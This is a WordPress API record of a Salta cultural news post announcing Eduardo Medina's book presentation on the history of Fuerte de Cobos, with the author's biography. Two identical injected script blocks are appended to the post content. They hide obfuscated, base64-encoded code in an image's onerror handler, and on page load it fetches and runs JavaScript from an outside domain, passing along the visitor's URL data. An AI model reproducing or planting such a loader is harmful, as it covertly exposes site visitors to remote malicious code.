{"id":2784,"date":"2023-06-28T10:56:04","date_gmt":"2023-06-28T13:56:04","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2784"},"modified":"2025-08-14T00:14:05","modified_gmt":"2025-08-14T03:14:05","slug":"llega-una-nueva-edicion-de-libros-y-vinos-en-el-mercado-artesanal-de-salta-2","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2784","title":{"rendered":"Llega una nueva edici\u00f3n de Libros y Vinos en el Mercado Artesanal de Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#910644\"><em>Ma\u00f1ana jueves 29 de junio a las 19 horas, el escritor Eduardo Medina presenta \u201cDatos para la historia del Fuerte de Cobos\u201d. Durante la presentaci\u00f3n se compartir\u00e1 con los presentes vinos regionales de La Bodeguita. Entrada gratuita.<\/em><\/h4>\n\n\n\n<p>Este jueves 29 de junio a las 19 horas, el escritor Eduardo Medina presenta \u201cDatos para la historia del Fuerte de Cobos\u201d. Durante la presentaci\u00f3n se compartir\u00e1 con los presentes vinos regionales de La Bodeguita. Entrada gratuita.<\/p>\n\n\n\n<p>El Mercado Artesanal de Salta en forma conjunta con la Sociedad Argentina de Escritores filial Salta, llevan a cabo la iniciativa \u201cLibros y Vinos\u201d, una propuesta que propicia un ambiente agradable de lectura, permitiendo al p\u00fablico emprender un viaje literario en el que el vino y el libro se unen para relajar y disfrutar las obras.<\/p>\n\n\n\n<p>En esta oportunidad, el poeta, escritor, historiador, editor y gestor cultural, Eduardo Medina, presenta \u201cDatos para la historia del Fuerte de Cobos\u201d, un aporte documental desde una perspectiva integradora para comprender un amplio arco temporal y espacial que se proyecta desde los procesos hist\u00f3ricos producidos con el establecimiento de los grupos hispanos-criollos en el siglo XVI hasta promediar el siglo XIX.<\/p>\n\n\n\n<p>La cita tendr\u00e1 lugar el jueves 29 de junio a las 19 horas en el Sal\u00f3n de Usos M\u00faltiples \u201cMar\u00eda Gertrudis Medeiros\u201d del Mercado Artesanal, Av. San Mart\u00edn 2555, con entrada gratuita.<\/p>\n\n\n\n<p>Los documentos que aporta Medina, dan cuenta de hechos que los discursos hegem\u00f3nicos tradicionales muchas veces han soslayado o minimizado.<br><br>Cobos fue testigo de las decisiones pol\u00edticas y territoriales de los expedicionarios y autoridades enviados por la corona espa\u00f1ola, de las luchas de tobas matacos y mocov\u00edes contra el invasor, del desarrollo de pr\u00e1cticas religiosas en consonancia con la historia socio\/pol\u00edtica de la \u00e9poca, de los dif\u00edciles y aciagos a\u00f1os de la guerra de independencia, del paso por su suelo de los principales jefes militares, como San Mart\u00edn, Manuel Belgrano, Mart\u00edn G\u00fcemes, Juan Mart\u00edn de Pueyrred\u00f3n, entre otros, de las luchas civiles a partir del a\u00f1o 1820, de la invasi\u00f3n de Felipe Varela.<\/p>\n\n\n\n<p>Acompa\u00f1a el evento La Bodeguita de la Asociaci\u00f3n del Valle de Animan\u00e1, local 6 del Mercado Artesanal de Salta.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7676-llega-una-nueva-edicion-de-libros-y-vinos-en-el-mercado-artesanal-de-salta.png\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7676-llega-una-nueva-edicion-de-libros-y-vinos-en-el-mercado-artesanal-de-salta.png\" alt=\"Llega una nueva edici\u00f3n de Libros y Vinos en el Mercado Artesanal de Salta\" width=\"410\" height=\"229\"\/><\/a><\/figure><\/div>\n\n\n<p><strong>Sobre el autor<\/strong><\/p>\n\n\n\n<p>Eduardo Medina, naci\u00f3 en General G\u00fcemes, Provincia de Salta, el 26 de mayo de 1979.<\/p>\n\n\n\n<p>Public\u00f3 los cuentos, El Dintel del Dominio (2001), Esquizofrenia (2005), Ave Errante (2007), Cuentos Cruentos (2012), El Hacedor de Sombras (2014), Cuentos Cruentos (Cuentos Completos) 2016 y C\u00edrculos (2022).<\/p>\n\n\n\n<p>Poes\u00edas, Cerrado por Refacciones (2008), Vestigios de un Ocaso (2014) y Viaje al microcosmos (2022).<\/p>\n\n\n\n<p>Ensayos Hist\u00f3ricos: G\u00fcemes, Departamento Oculto (2007), Moldes, el incorruptible (2015), Cuarenta D\u00edas en Campo Santo (2016), Valle de Siancas en la Guerra por la Independencia 1813 &#8211; 1817 (2017), Gertrudis Medeiros, Hero\u00edna de la Patria (2018), El Progreso, Historia del Ferrocarril en Argentina (2018), Valle de Siancas Bajo el Manto de la Candelaria (2019), Adela, Historia de un femicidio (2019) y Datos para la Historia del Fuerte de Cobos (2020).<\/p>\n\n\n\n<p>Recibi\u00f3 varios premios por su labor como gestor cultural y como escritor, entre ellos: Premio Persona 2005 por el Programa Radial Cultural La Cueva. Premio Persona 2015 por la Trayectoria Cultural. Premio Persona Destacada por la Municipalidad de General G\u00fcemes 2012. Primer Premio Provincial de Poes\u00eda Manuel J Castilla, Salta 2005. Premio Provincial Memoria Joven, Tierra del Fuego 2007.<\/p>\n\n\n\n<p>En 2007 fund\u00f3 la editorial Ediciones del Duende, con m\u00e1s de 400 t\u00edtulos, revistas culturales, gacetillas y plaquetas publicadas.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/llega-una-nueva-edicion-de-libros-y-vinos-en-el-mercado-artesanal-de-salta-90376\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ma\u00f1ana jueves 29 de junio a las 19 horas, el escritor Eduardo Medina presenta \u201cDatos para la historia del Fuerte de Cobos\u201d. Durante la presentaci\u00f3n se compartir\u00e1 con los presentes vinos regionales de La Bodeguita. Entrada gratuita. Este jueves 29 de junio a las 19 horas, el escritor Eduardo Medina presenta \u201cDatos para la historia [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2785,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24,26,18,17],"tags":[],"class_list":{"0":"post-2784","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas","8":"category-culturales","9":"category-rutas-y-caminos","10":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2784"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2784"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2784\/revisions"}],"predecessor-version":[{"id":7044,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2784\/revisions\/7044"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2785"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2784"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2784"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2784"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}